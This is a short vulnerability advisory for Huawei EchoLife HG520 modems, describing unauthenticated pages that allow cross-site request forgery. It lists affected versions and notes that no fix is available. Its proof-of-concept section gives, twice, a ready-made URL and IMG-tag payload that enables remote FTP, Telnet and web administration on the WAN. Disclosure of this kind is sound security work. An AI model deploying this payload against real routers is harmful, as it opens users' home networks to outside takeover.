Huawei EchoLife HG520 RemoteManagement CSRFHuawei EchoLife HG520 RemoteManagement CSRF
Summary
Huawei EchoLife HG520 modems do not require authentication to access certain pages such as: '/Forms/access_cwmp_1', '/Forms/rpQos_1' and '/Forms/rpRManage_1'. A CSRF exploit can be used to enable remote administration inerfaces on the WAN.
Description
=========================================
HUAWEI ECHOLIFE HG520 RemoteManagement CSRF
=========================================
Device: Huawei EchoLife HG520
Software Version: V100R001B021Telmex
V100R001B020Telmex
Firmware Version: 3.10.18.7-1.0.7.0 (latest version)
3.10.18.5-1.0.7.0
Vulnerable Models: HG520c
HG520b
Published date: 2010-04-00
Criticity: High
Impact: Enable remote admin on WAN
Location: Web interface (LAN/WAN)
Solution: Not available
Websec-id: ws10-12
DESCRIPTION
=======================
Huawei EchoLife HG520 modems do not require authentication to access certain pages such as: '/Forms/access_cwmp_1', '/Forms/rpQos_1' and '/Forms/rpRManage_1'. A CSRF exploit can be used to enable remote administration inerfaces on the WAN.
EXPLOIT / POC
=======================
Enable FTP, TELNET and WEB by sending a request to:
http://192.168.1.254/Forms/rpRManage_1?ACL_active=0
Client-Side:
<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>
SOLUTION
=======================
Not available.
DISCLOSURE TIMELINE
=======================
2010/03/20 - Vulnerability discovered
REFERENCES
=======================
Hakim.Ws - http://www.hakim.ws
Websec - http://websec.mx
Websec.mx
POC
<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>
YOUTUBE
TWITTER
FACEBOOK
BLOG
EMAIL US